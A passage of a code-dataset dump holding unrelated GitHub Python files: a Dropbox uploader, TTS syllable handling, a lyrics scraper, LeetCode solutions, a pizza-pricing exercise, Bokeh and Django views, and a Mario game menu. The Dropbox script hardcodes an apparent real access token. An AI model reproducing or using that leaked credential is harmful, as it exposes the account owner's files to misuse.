main(out_dir)\n\n","repo_name":"Bruno81930/extreme-imbalanced-sbdf","sub_path":"dataset-processing/dataset-preparation/bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1984024046","text":"import dropbox\r\nimport os\r\nclass TransferData:\r\n def __init__(self, access_token):\r\n self.access_token = access_token\r\n\r\n def upload_file(self, file_from, file_to):\r\n dbx = dropbox.Dropbox(self.access_token)\r\n\r\n with open(file_from, 'rb') as f:\r\n dbx.files_upload(f.read(), file_to)\r\n os.path.realpath(file_from)\r\n os.path.join(file_to)\r\n\r\ndef main():\r\n access_token = 'ItXP46HeAkQAAAAAAAAAARzMVfUixr3dVBISJV_YdOsqpPbJbCosjrlhH2gasLfJ'\r\n transferData = TransferData(access_token)\r\n\r\n file_from = input(\"Enter File Path on PC : \")\r\n file_to = input(\"ENter File Path in Dropbox : \")\r\n\r\n transferData.upload_file(file_from, file_to)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"WolfBaneYT/incompleteDropboxBackup","sub_path":"uploadFiles.py","file_name":"uploadFiles.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23943215112","text":"import xml.etree.ElementTree as ET\n\nfrom .xml_obj import XmlObj\n\n\nclass Syllable(XmlObj):\n\n def __init__(self):\n self.m_phone_list = []\n self.m_tone = None\n self.m_language = None\n self.m_breaklevel = None\n\n def pronunciation_text(self):\n return ' '.join([str(phone) for phone in self.m_phone_list])\n\n def phone_count(self):\n return len(self.m_phone_list)\n\n def tone_text(self):\n return str(self.m_tone.value)\n\n def save(self):\n pass\n\n def load(self):\n pass\n\n def get_phone_meta(self,\n phone_name,\n word_pos,\n syll_pos,\n tone_text,\n single_syllable_word=False):\n # Special case: word with single syllable, the last phone's word_pos should be \"word_end\"\n if word_pos == 'word_begin' and syll_pos == 's_end' and single_syllable_word:\n word_pos = 'word_end'\n elif word_pos == 'word_begin' and syll_pos not in [\n 's_begin',\n 's_both',\n ]: # FIXME: keep accord with Engine logic\n word_pos = 'word_middle'\n 
elif word_pos == 'word_end' and syll_pos not in ['s_end', 's_both']:\n word_pos = 'word_middle'\n else:\n pass\n\n return '{{{}$tone{}${}${}}}'.format(phone_name, tone_text, syll_pos,\n word_pos)\n\n def save_metafile(self, word_pos, single_syllable_word=False):\n syllable_phone_cnt = len(self.m_phone_list)\n\n meta_line_list = []\n\n for idx, phone in enumerate(self.m_phone_list):\n if syllable_phone_cnt == 1:\n syll_pos = 's_both'\n elif idx == 0:\n syll_pos = 's_begin'\n elif idx == len(self.m_phone_list) - 1:\n syll_pos = 's_end'\n else:\n syll_pos = 's_middle'\n meta_line_list.append(\n self.get_phone_meta(\n phone,\n word_pos,\n syll_pos,\n self.tone_text(),\n single_syllable_word=single_syllable_word,\n ))\n\n return ' '.join(meta_line_list)\n\n\nclass SyllableList(XmlObj):\n\n def __init__(self, syllables):\n self.m_syllable_list = syllables\n\n def __len__(self):\n return len(self.m_syllable_list)\n\n def __index__(self, index):\n return self.m_syllable_list[index]\n\n def pronunciation_text(self):\n return ' - '.join([\n syllable.pronunciation_text() for syllable in self.m_syllable_list\n ])\n\n def tone_text(self):\n return ''.join(\n [syllable.tone_text() for syllable in self.m_syllable_list])\n\n def save(self, parent_node):\n syllable_node = ET.SubElement(parent_node, 'syllable')\n syllable_node.set('syllcount', str(len(self.m_syllable_list)))\n\n phone_node = ET.SubElement(syllable_node, 'phone')\n phone_node.text = self.pronunciation_text()\n\n tone_node = ET.SubElement(syllable_node, 'tone')\n tone_node.text = self.tone_text()\n\n return\n\n def load(self):\n pass\n","repo_name":"open-models-platform/open.models.llm-rlhf","sub_path":"modelscope/modelscope/models/audio/tts/kantts/preprocess/script_convertor/core/syllable.py","file_name":"syllable.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"73323754705","text":"import re, requests\nfrom bs4 import BeautifulSoup\n\ndef wikicase(s):\n\t\"\"\"Return a string in LyricWiki case.\n\tSubstitutions are performed as described at\n\t.\n\tEssentially that means capitalizing every word and substituting certain\n\tcharacters.\"\"\"\n\n\twords = s.split()\n\tnewwords = []\n\tfor word in words:\n\t\tnewwords.append(word[0].capitalize() + word[1:])\n\ts = \"_\".join(newwords)\n\ts = s.replace(\"<\", \"Less_Than\")\n\ts = s.replace(\">\", \"Greater_Than\")\n\ts = s.replace(\"#\", \"Number_\")\n\ts = s.replace(\"[\", \"(\")\n\ts = s.replace(\"]\", \")\")\n\ts = s.replace(\"{\", \"(\")\n\ts = s.replace(\"}\", \")\")\n\n\ts = s.replace(\"!\", \"\")\n\treturn s\n\ndef getlyrics(artist, title):\n\n\tbase = \"http://lyrics.wikia.com/\"\n\tpage = artist + ':' + title\n\n\tsoup = BeautifulSoup(requests.get(base + page).text)\n\ttry:\n\t\trawLyrics = soup.select(\".lyricbox\")[0]\n\texcept IndexError:\n\t\treturn \"\" #no lyrics to be found\n\n#\timport pdb; pdb.set_trace()\n\tlyrics = \"\"\n\tfor thing in rawLyrics.contents:\n\t\tif isinstance(thing, unicode) and '[' not in thing and 'p>' not in thing:\n\t\t\tlyrics += thing + \" \"\n\treturn lyrics.strip()\n","repo_name":"itsmeolivia/billboardtop100WORDS","sub_path":"lyrics/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73264480466","text":"import cv2\nimport numpy as np\nimport face_recognition\n\nimgSin = 
face_recognition.load_image_file('picture/sinmina1.jpg')\nimgSin = cv2.cvtColor(imgSin, cv2.COLOR_BGR2RGB)\nimgTest = face_recognition.load_image_file('picture/sinmina2.jpg')\nimgTest = cv2.cvtColor(imgTest, cv2.COLOR_BGR2RGB)\n\nfaceTarget = face_recognition.face_locations(imgSin)[0]\nencodeSin = face_recognition.face_encodings(imgSin)[0]\ncv2.rectangle(imgSin, (faceTarget[3], faceTarget[0]), (faceTarget[1], faceTarget[2]), (255, 0, 255), 2)\n\ncv2.imshow('sinmina', imgSin)\ncv2.imshow('sinmina_test', imgTest)\ncv2.waitKey(0)\n","repo_name":"dgtalist/ChungAng","sub_path":"Day_4/04_face_rec_02.py","file_name":"04_face_rec_02.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7385635511","text":"# https://leetcode.cn/problems/longest-increasing-path-in-a-matrix/\n\nfrom collections import deque\nfrom typing import List\n\n\nclass Solution_BFS:\n def __init__(self):\n self.deg = []\n self.dist = []\n self.to = []\n self.m = 0\n self.n = 0\n self.dx = [-1, 0, 0, 1]\n self.dy = [0, -1, 1, 0]\n self.q = deque()\n\n def longestIncreasingPath(self, matrix: List[List[int]]) -> int:\n\n self.m = len(matrix)\n self.n = len(matrix[0])\n self.to = [[] for _ in range(self.m * self.n)]\n self.deg = [0 for _ in range(self.m * self.n)]\n self.dist = [0 for _ in range(self.m * self.n)]\n for i in range(self.m):\n for j in range(self.n):\n for k in range(4):\n nx = i + self.dx[k]\n ny = j + self.dy[k]\n if nx < 0 or nx >= self.m or ny < 0 or ny >= self.n:\n continue\n if matrix[nx][ny] > matrix[i][j]:\n self.add_edge(self.num(i, j), self.num(nx, ny))\n\n for i in range(self.m * self.n):\n if self.deg[i] == 0:\n self.q.append(i)\n self.dist[i] = 1\n while self.q:\n x = self.q.popleft()\n for y in self.to[x]:\n self.deg[y] -= 1\n self.dist[y] = max(self.dist[y], self.dist[x] + 1)\n if self.deg[y] == 0:\n self.q.append(y)\n ans = 0\n for i in range(self.m * self.n):\n ans = max(ans, self.dist[i])\n return ans\n\n def num(self, i, j):\n return i * self.n + j\n\n def add_edge(self, u, v):\n self.deg[v] += 1\n self.to[u].append(v)\n\n\nclass Solution_DFS:\n\n def __init__(self):\n self.m = None\n self.n = None\n self.matrix = None\n self.dx = None\n self.dy = None\n self.dist = None\n\n def longestIncreasingPath(self, matrix: List[List[int]]) -> int:\n self.m = len(matrix)\n self.n = len(matrix[0])\n self.matrix = matrix\n self.dist = [[0 for _ in range(self.n)] for _ in range(self.m)]\n self.dx = [-1, 0, 0, 1]\n self.dy = [0, -1, 1, 0]\n ans = 0\n for i in range(self.m):\n for j in range(self.n):\n ans = max(ans, self.dfs(i, j))\n return ans\n\n def dfs(self, x, y) -> int:\n if self.dist[x][y] != 0:\n return self.dist[x][y]\n self.dist[x][y] = 1\n for i in range(4):\n nx = x + self.dx[i]\n ny = y + self.dy[i]\n if nx < 0 or nx >= self.m or ny < 0 or ny >= self.n:\n continue\n if self.matrix[nx][ny] > self.matrix[x][y]:\n self.dist[x][y] = max(self.dist[x][y], self.dfs(nx, ny) + 1)\n return self.dist[x][y]\n","repo_name":"ChenBingwei/Algorithm_geekbang_fifth","sub_path":"week05/example/ltc329_longest_increasing_path_in_a_matrix.py","file_name":"ltc329_longest_increasing_path_in_a_matrix.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13119139312","text":"#Andrew Barton: CSC 110 Wk 5 Homework - 10/25/18\r\n#Pete's pizza palace program takes user input form the size of the pizza and how\r\n#many pizza's 
wanted. The program will calculate the total price with current\r\n#deal going on and sales tax at 10.1%\r\n\r\n#Global Constants\r\nSALESTAX = .101\r\nDISCOUNT = .10\r\nSMALL = 8.99\r\nMEDIUM = 14.99\r\nMED_SECOND = 7.99\r\nLARGE = 24.99\r\n\r\n#Ask user for Size of the pizza and how many, based on size send to appropriate\r\n#function to perform calculations. Functions will return price and send to Taxes\r\ndef main():\r\n print(\"Welcome to Pete's Pizza Palace\")\r\n print(\"Please enter the size you would like\")\r\n \r\n size = input(\"'s' for Small, 'm' for Medium, or 'l' for Large: \")\r\n size = size.upper()\r\n \r\n #test for correct pizza size\r\n if size == 'S' or size == 'M' or size == 'L':\r\n \r\n quantity = int(input(\"How many Pizza(s) would you like to order: \"))\r\n\r\n #this case will prevent a invalid number from being calculated \r\n if quantity < 1:\r\n print(\"You have entered an invalid number. Please try again\")\r\n \r\n elif size == 'L':\r\n pizzaCost = large(quantity)\r\n taxCost = tax(pizzaCost)\r\n total = pizzaCost + taxCost\r\n return printOutput(\"Large\", quantity, pizzaCost, taxCost, total)\r\n\r\n elif size == 'M':\r\n pizzaCost = medium(quantity)\r\n taxCost = tax(pizzaCost)\r\n total = pizzaCost + taxCost\r\n return printOutput(\"Medium\", quantity, pizzaCost, taxCost, total)\r\n\r\n elif size == 'S':\r\n pizzaCost = large(quantity)\r\n taxCost = tax(pizzaCost)\r\n total = pizzaCost + taxCost\r\n return printOutput(\"Small\", quantity, pizzaCost, taxCost, total)\r\n\r\n else:\r\n print(\"You entered an invalid size, please restart and try again\")\r\n\r\n#This function will take in how many Large pizza's the user wants and calculates\r\n#the price without tax. If user wants more then 3 pizza's apply a 10% discount\r\ndef large(amount):\r\n sub_total = amount * LARGE\r\n if amount >= 3:\r\n discount = sub_total * DISCOUNT\r\n total = sub_total - discount\r\n return total\r\n else:\r\n return sub_total\r\n\r\n#calculate the price for medium size pizzas with a 'buy 1 get 2nd half off' deal\r\ndef medium(amount):\r\n twoPizzaCal = amount // 2\r\n fullPricePizza = twoPizzaCal * MEDIUM\r\n halfPricePizza = twoPizzaCal * MED_SECOND\r\n #if there is an odd number of pizza's we will calculate the extra here\r\n extraPizzaCal = amount % 2\r\n extraPizzaPrice = extraPizzaCal * MEDIUM\r\n sub_total = fullPricePizza + halfPricePizza + extraPizzaPrice\r\n return sub_total\r\n \r\n#small pizza's don't have a deal going on, just calculate and return\r\ndef small(amount):\r\n sub_total = amount * SMALL\r\n return sub_total\r\n\r\n#This calculate the sales tax but doesn't add it to the price\r\ndef tax(price):\r\n return price * SALESTAX\r\n\r\n#This funtion deals only with output\r\ndef printOutput(size, amount, price, taxes, total):\r\n price = '{:.2f}'.format(price)\r\n taxes = '{:.2f}'.format(taxes)\r\n total = '{:.2f}'.format(total)\r\n print(\"You asked for \" + str(amount) + \" \" + size + \" Pizza(s)\")\r\n print(\"Sub Total: $\" + str(price))\r\n print(\"Taxes: $\" + str(taxes))\r\n print(\"Total: $\" + str(total))\r\n\r\nmain()\r\n\r\n#TEST 1: Size 'l'; Quantity 5; subtotal 112.45; taxes 11.36; total 123.81\r\n#TEST 2: Size 'M'; Quantity 7; subtotal 83.93; taxes 8.48; total 92.41\r\n#TEST 3: Size 'S'; Quantity -4; Error message\r\n#TEST 4: Size 'w'; Error message\r\n\r\n#started this assignment writing the function names first, then started to\r\n#define main() with input for a large pizza, then wrote the function to handle\r\n#the large pizza calculations. 
Once large was good i copied the format for the\r\n#next two sizes.For a short while I got stuck with the 'else' statement always\r\n#printing at the end with an 'if' statement but I read up on the 'elif' and went\r\n#with that and it worked out great.\r\n\r\n#I tested the cases above on paper then sent them through the program to make\r\n#sure my algorithm was correct. Everything worked out well, I think the next\r\n#step I should fix is testing for 'null' in case the user doesn't enter anything\r\n\r\n#I learned that the 'elif' is very important for the correct flow of the program\r\n#when dealing with mulitple logic cases. I think next time I would also print\r\n#the amount you saved from the deals going on like \"You saved: $xx.xx\"\r\n","repo_name":"local80forlife/CollegeClasses","sub_path":"Barton_wk5 Homework.py","file_name":"Barton_wk5 Homework.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22216388443","text":"from bokeh.layouts import row, column\n\nfrom config.global_config import Res, Prod\nfrom grpc_clients import admin_page\nfrom host_figures import TransactionTable, ProductionTable, ButtonComponent, \\\n TextBoxComponent\nfrom bokeh.models.widgets import Button, Div\n\nclass UI:\n def __init__(self, portno):\n self.portno = portno\n self.transaction_table = TransactionTable()\n self.production_table = ProductionTable()\n self.time_box = self._build_time_box()\n self.next_turn_button = self._build_next_turn()\n self.refresh_button = self._build_refresh()\n self.ping_button = self._build_ping()\n self.label_row = self._labels_row()\n self.layout = self.plot()\n\n def _build_next_turn(self):\n specs = dict()\n specs['text'] = \"Next Turn\"\n specs['width'] = 70\n specs['height'] = 30\n button = ButtonComponent(specs, self.widget_callback)\n return button\n\n def _build_ping(self):\n specs = dict()\n specs['text'] = \"Ping\"\n specs['width'] = 70\n specs['height'] = 30\n button = ButtonComponent(specs, self.ping_callback)\n return button\n\n def _build_refresh(self):\n specs = dict()\n specs['text'] = \"Refresh\"\n specs['width'] = 70\n specs['height'] = 30\n button = ButtonComponent(specs, self.get_calls)\n return button\n\n def get_calls(self):\n print(f\"get_calls called with portno {self.portno}.\")\n for call in admin_page.getCall(self.portno):\n call = self._format_changes(call)\n self.figure_update(call)\n\n def _format_changes(self, request):\n output = dict()\n output['userid'] = request.userid\n for res in Res:\n tag = \"transaction_\" + res.name\n if res.name.upper() in request.buySell:\n output[tag] = request.buySell[res.name.upper()]\n else:\n output[tag] = 0\n for prod in Prod:\n tag = \"transaction_\" + prod.name\n if prod.name.upper() in request.buySell:\n output[tag] = request.buySell[prod.name.upper()]\n else:\n output[tag] = 0\n\n tag = \"production_\" + prod.name\n if prod.name.upper() in request.make:\n output[tag] = request.make[prod.name.upper()]\n else:\n output[tag] = 0\n return output\n\n def _build_time_box(self):\n specs = dict()\n specs['text'] = \"Time: 0\"\n specs['height'] = 20\n specs['width'] = 50\n return TextBoxComponent(specs)\n\n def figure_update(self, update):\n # self.time_box.widget.text = update['time']\n self.transaction_table.figure_update(update)\n self.production_table.figure_update(update)\n return True\n\n def _labels_row(self):\n transaction_label = TextBoxComponent(dict(text='Transactions',\n width=100, height=10))\n 
production_label = TextBoxComponent(\n            dict(text='Productions', width=100, height=10))\n        label_row = row(Div(width=53), transaction_label.widget,\n                        Div(width=317),\n                        production_label.widget)\n        return label_row\n\n    def plot(self):\n        layout = column(self.time_box.widget,\n                        self.label_row,\n                        row(row(self.transaction_table.figure, width=self\n                                .transaction_table.width),\n                            row(self.production_table.figure,\n                                width=self.production_table.width)),\n                        # row(self.transaction_table.figure,\n                        #     self.production_table.figure),\n                        row(self.next_turn_button.widget,\n                            self.refresh_button.widget, self.ping_button.widget))\n        return layout\n\n    def widget_callback(self, call):\n        print(f\"next_turn_button called.\")\n        time = admin_page.nextTurn(self.portno).message\n        self.time_box.widget.text = \"Time: \" + time\n        return True\n\n    def ping_callback(self, call):\n        print(f\"ping_button called.\")\n        admin_page.ping(self.portno)\n        return True\n","repo_name":"MelvinYin/Plushie_Tycoon","sub_path":"python/host_page/admin_ui.py","file_name":"admin_ui.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27744849400","text":"import datetime\n\nimport img2pdf\nimport os\nfrom pathlib import Path\n\n\ndef convert_to_pdf():\n    \"\"\"\n    Merge all .jpg images in the current directory\n    (i.e. the same directory the script is located in)\n    \"\"\"\n    img_list = []\n\n    for file_name in os.listdir():\n        if not file_name.endswith(\".jpg\"):\n            continue\n        path = str(Path(file_name))\n        if os.path.isdir(path):\n            continue\n        img_list.append(path)\n\n    if img_list:\n        with open(f\"{datetime.datetime.now().strftime('%d_%m_%Y')}.pdf\", \"wb\") as f:\n            f.write(img2pdf.convert(img_list))\n\n\ndef main():\n    convert_to_pdf()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Barashkis/InterestingFunctions","sub_path":"convert_jpg_to_pdf/jpg_to_pdf.py","file_name":"jpg_to_pdf.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1687960104","text":"# -*- coding:utf-8 -*-\n# @Time : 2020/ /\n# @Author : goldsunC\n# @Email : 2428022854@qq.com\n# @Blog : https://blog.csdn.net/weixin_45634606\nfrom .. import setup\nfrom .. import tools\nfrom .. 
import constants as C\nimport pygame\nfrom ..components import info\n\nclass MainMenu:\n    def __init__(self):\n        self.setup_background()  # set up the screen background\n        self.setup_player()  # place Mario\n        self.setup_cursor()  # place the coin cursor\n        self.info = info.Info('main_menu')  # draw the various info\n        self.finished = False\n        self.next = 'load_screen'  # the next state is the load screen\n\n    def setup_background(self):\n        # set the background image\n        self.background = setup.GRAPHICS['level_1']\n\n        # background.get_rect() gives the background area: (left,top,width,height)\n        # the first two are the screen coordinates of the top-left corner, the last two are the width and height\n        self.background_rect = self.background.get_rect()\n        # transform.scale is used to scale the image proportionally\n        self.background = pygame.transform.scale(self.background,(int(self.background_rect.width*C.BG_MULTI),\n                                                                  int(self.background_rect.height*C.BG_MULTI)))\n        # this is the configured screen area\n        self.viewport = setup.SCREEN.get_rect()\n        # this is part of the start menu; crop out the image we need\n        self.caption = tools.get_image(setup.GRAPHICS['title_screen'],1,60,176,88,(255,0,220),C.BG_MULTI)\n\n    def setup_player(self):\n        # the cropped Mario image\n        self.player_image = tools.get_image(setup.GRAPHICS['mario_bros'],178,32,12,16,(0,0,0),C.PLAYER_MUTI)\n\n\n# \"cursor\" here means the menu selection pointer\n    def setup_cursor(self):\n        # sprite.Sprite is a sprite object, used to manage the blinking coin in the start menu\n        self.cursor = pygame.sprite.Sprite()\n        # assign the cropped coin image to the coin object\n        self.cursor.image = tools.get_image(setup.GRAPHICS['item_objects'],24,160,8,8,(0,0,0),C.PLAYER_MUTI)\n        # get the coin's rect, mainly for its width and height, since the image position is always (0,0)\n        rect = self.cursor.image.get_rect()\n        # set the position\n        rect.x,rect.y = (220,360)\n        # update\n        self.cursor.rect = rect\n\n        self.cursor.state = '1P'  # state\n\n    def update_cursor(self,keys):\n        if keys[pygame.K_UP]:\n            self.cursor.state = '1P'\n            self.cursor.rect.y = 360\n        elif keys[pygame.K_DOWN]:\n            self.cursor.state = '2P'\n            self.cursor.rect.y = 405\n        elif keys[pygame.K_RETURN]:\n            # pressing Enter means the current state is finished\n            if self.cursor.state == '1P':\n                self.finished = True\n            elif self.cursor.state == '2P':\n                self.finished = True\n\n    def update(self,surface,keys):\n        # first update any state change triggered by key presses\n        self.update_cursor(keys)\n        # redraw so the screen updates\n        surface.blit(self.background,self.viewport)\n        surface.blit(self.caption,(170,100))\n        surface.blit(self.player_image,(110,490))\n        surface.blit(self.cursor.image,self.cursor.rect)\n\n        self.info.update()  # here the cursor refers only to the coin object\n        self.info.draw(surface)","repo_name":"WCY-add/Super_mario-GAME","sub_path":"Material_document/source/states/main_menu.py","file_name":"main_menu.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1943047280","text":"import matplotlib.pyplot as plt\nimport seaborn as ssn\nimport numpy as np\n\nimport prettyplotlib as ppl\n\n\ndef plot_sin():\n    fig = plt.figure()\n    ax = plt.subplot(111)\n\n    a = np.linspace(0,10,1000)\n    b = np.linspace(0,10,1000)\n    A,B = np.meshgrid(a,b)\n\n\n    t = 1\n    Z = A*np.sin(t*np.pi*B/A) / (A**2 - B**2)\n\n    plt.imshow(Z)\n    plt.show()\n\nfig = plt.figure()\nax = plt.subplot(111)\n\nw = 100 \n\nt = np.linspace(0,2,1000)\nU = t - np.floor(t) + 0.1 * np.sin(w*t)\n\nplt.plot(t,U)\nplt.xlabel(\"$t/T$\",fontsize = 14)\nplt.ylabel(\"$U/U_{sz}$\",fontsize = 14)\nplt.show()\n\n","repo_name":"Bondzio/fp","sub_path":"nmr/analysis/sin2.py","file_name":"sin2.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13812053642","text":"from django.shortcuts import redirect, render\nfrom django.core.mail import BadHeaderError, send_mail\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom . 
forms import ContactForm\n\n\ndef send_email(request):\n    if request.method == \"POST\":\n        form = ContactForm(request.POST)\n        if form.is_valid():\n            #if you are curious about how I get (subject, email and message):\n            # in the templates, inspect the element and find the input tag; you will see the name of each input \n            subject = form.cleaned_data[\"subject\"]\n            from_email = form.cleaned_data[\"email\"]\n            message = form.cleaned_data[\"message\"]\n            form = ContactForm()\n            try:\n                #no_reply@gmail.com is the recipient of this email\n                send_mail(subject, message, from_email, ['no_reply@gmail.com'], fail_silently=False)\n            except BadHeaderError:\n                return HttpResponse(\"Invalid data, please make sure that you are entering the right data\")\n            return redirect(\"contact:send_success\")\n    else:\n        form = ContactForm()\n\n    context = {\n        'form':form\n    }\n    return render(request, \"contact/contact.html\", context)\n    \n\n\ndef send_success(request):\n    return HttpResponse(\"Thanks in advance from your email (^_^)\")\n","repo_name":"Shirhussain/Restaurant","sub_path":"contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34522710583","text":"\"\"\"This file contains the CloudRecordSummaryView class.\"\"\"\n\nimport ConfigParser\nimport datetime\nimport logging\nimport MySQLdb\n\nfrom rest_framework.pagination import PaginationSerializer\nfrom django.conf import settings\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom api.utils.TokenChecker import TokenChecker\n\n\nclass CloudRecordSummaryView(APIView):\n    \"\"\"\n    Retrieve Cloud Accounting Summaries.\n\n    Usage:\n\n    .../api/v1/cloud/record/summary?user=&from=&to=\n\n    Will return the summary for global_user_name at all services,\n    between date_from and date_to (exclusive) as daily summaries\n\n    .../api/v1/cloud/record/summary?group=&from=&to=\n\n    Will return the summary for group_name at all services,\n    between date_from and date_to (exclusive) as daily summaries\n\n    .../api/v1/cloud/record/summary?service=&from=&to=\n\n    Will return the summary for service_name at all groups,\n    between date_from and date_to (exclusive) as daily summaries\n\n    .../api/v1/cloud/record/summary?from=\n\n    Will give summary for whole infrastructure from date_from\n    (exclusive) to now\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"Set up class level logging.\"\"\"\n        self.logger = logging.getLogger(__name__)\n        self._token_checker = TokenChecker()\n        super(CloudRecordSummaryView, self).__init__()\n\n    def get(self, request, format=None):\n        \"\"\"\n        Retrieve Cloud Accounting Summaries.\n\n        .../api/v1/cloud/record/summary?user=&from=&to=\n\n        Will return the summary for global_user_name at all services,\n        between date_from and date_to (exclusive) as daily summaries\n\n        .../api/v1/cloud/record/summary?group=&from=&to=\n\n        Will return the summary for group_name at all services,\n        between date_from and date_to (exclusive) as daily summaries\n\n        .../api/v1/cloud/record/summary?service=&from=&to=\n\n        Will return the summary for service_name at all groups,\n        between date_from and date_to (exclusive) as daily summaries\n\n        .../api/v1/cloud/record/summary?from=\n\n        Will give summary for whole infrastructure from\n        date_from (exclusive) to now\n        \"\"\"\n        client_token = self._request_to_token(request)\n        if client_token is None:\n            return Response(status=401)\n\n        # The token 
checker will introspect the token,\n        # i.e. check it's in-date, correctly signed etc\n        # and return the client_id of the token\n        client_id = self._token_checker.valid_token_to_id(client_token)\n        if client_id is None:\n            return Response(status=401)\n\n        if not self._is_client_authorized(client_id):\n            return Response(status=403)\n\n        # parse query parameters\n        (group_name,\n         service_name,\n         start_date,\n         end_date,\n         global_user_name) = self._parse_query_parameters(request)\n\n        # Check that at most one of group_name, service_name\n        # and global_user_name is set as having more than\n        # one defined is currently ambiguous while retrieval\n        # against only one parameter per GET request is supported.\n        parameters_to_check = (group_name, service_name, global_user_name)\n        set_count = sum([1 for para in parameters_to_check if para is None])\n        if set_count <= 1:\n            self.logger.error(\"User, Group and/or Service combined.\")\n            self.logger.error(\"Rejecting request.\")\n            return Response(\"Only one of User, Group and Service can be set.\",\n                            status=400)\n\n        if start_date is None:\n            # querying without a from is not supported\n            return Response(\"'from' must be set in GET requests.\",\n                            status=400)\n\n        # Read configuration from file\n        try:\n            dbcp = ConfigParser.ConfigParser()\n            dbcp.read(settings.CLOUD_DB_CONF)\n\n            db_hostname = dbcp.get('db', 'hostname')\n            # db_port = int(dbcp.get('db', 'port'))\n            db_name = dbcp.get('db', 'name')\n            db_username = dbcp.get('db', 'username')\n            db_password = dbcp.get('db', 'password')\n        except (ConfigParser.Error, ValueError, IOError) as err:\n            self.logger.warning('Error in configuration file %s: %s',\n                                settings.CLOUD_DB_CONF,\n                                err)\n            self.logger.warning('Using default configuration.')\n\n            db_hostname = 'localhost'\n            db_name = 'apel_rest'\n            db_username = 'root'\n            db_password = ''\n\n        # get the data requested\n        try:\n            database = MySQLdb.connect(db_hostname,\n                                       db_username,\n                                       db_password,\n                                       db_name)\n        except MySQLdb.OperationalError:\n            # do not include the database password in the log message\n            self.logger.error(\"Could not connect to %s at %s as user %s\",\n                              db_name, db_hostname, db_username)\n            return Response(status=500)\n\n        cursor = database.cursor(MySQLdb.cursors.DictCursor)\n\n        if global_user_name is not None:\n            cursor.execute('select * from VCloudSummaries '\n                           'where GlobalUserName = %s '\n                           'and EarliestStartTime > %s '\n                           'and LatestStartTime < %s',\n                           [global_user_name, start_date, end_date])\n\n        elif group_name is not None:\n            cursor.execute('select * from VCloudSummaries '\n                           'where VOGroup = %s '\n                           'and EarliestStartTime > %s '\n                           'and LatestStartTime < %s',\n                           [group_name, start_date, end_date])\n\n        elif service_name is not None:\n            cursor.execute('select * from VCloudSummaries '\n                           'where SiteName = %s and '\n                           'EarliestStartTime > %s and '\n                           'LatestStartTime < %s',\n                           [service_name, start_date, end_date])\n\n        else:\n            cursor.execute('select * from VCloudSummaries '\n                           'where EarliestStartTime > %s',\n                           [start_date])\n\n        results = self._filter_cursor(cursor)\n        results = self._paginate_result(request, results)\n        return Response(results, status=200)\n\n###############################################################################\n#                                                                             #\n#                              Helper methods                                 #\n#                                                                             #\n###############################################################################\n\n    def _parse_query_parameters(self, request):\n        \"\"\"Parse expected query parameters from the given HTTP request.\"\"\"\n        group_name = request.GET.get('group', '')\n        if group_name == \"\":\n            group_name = None\n\n        service_name = request.GET.get('service', '')\n        if service_name == \"\":\n            
service_name = None\n\n        start_date = request.GET.get('from', '')\n        if start_date == \"\":\n            start_date = None\n\n        end_date = request.GET.get('to', '')\n        if end_date == \"\":\n            end_date = datetime.datetime.now()\n\n        global_user_name = request.GET.get('user', '')\n        if global_user_name == \"\":\n            global_user_name = None\n\n        # Log query parameters\n        self.logger.debug(\"Query Parameters\")\n        self.logger.debug(\"Group name = %s\", group_name)\n        self.logger.debug(\"Service name = %s\", service_name)\n        self.logger.debug(\"Start date = %s\", start_date)\n        self.logger.debug(\"End date = %s\", end_date)\n        self.logger.debug(\"Global Username = %s\", global_user_name)\n\n        return (group_name, service_name, start_date,\n                end_date, global_user_name)\n\n    def _paginate_result(self, request, result):\n        \"\"\"Paginate result based on the request and apel_rest settings.\"\"\"\n        paginator = Paginator(result, settings.RESULTS_PER_PAGE)\n        try:\n            page = request.GET.get('page')\n        except AttributeError:\n            page = 1\n\n        try:\n            result = paginator.page(page)\n        except PageNotAnInteger:\n            # If page is not an integer, deliver first page.\n            result = paginator.page(1)\n        except EmptyPage:\n            # If page is out of range (e.g. 9999),\n            # deliver last page of results.\n            result = paginator.page(paginator.num_pages)\n\n        # context allows for clickable REST Framework links\n        serializer = PaginationSerializer(instance=result,\n                                          context={'request': request})\n        return serializer.data\n\n    def _filter_cursor(self, cursor):\n        \"\"\"\n        Filter database results based on settings.RETURN_HEADERS.\n\n        Allows for configuration of what summary fields\n        the REST interface returns on GET requests.\n        \"\"\"\n        results_list = []\n        # Use results_list to store individual summaries 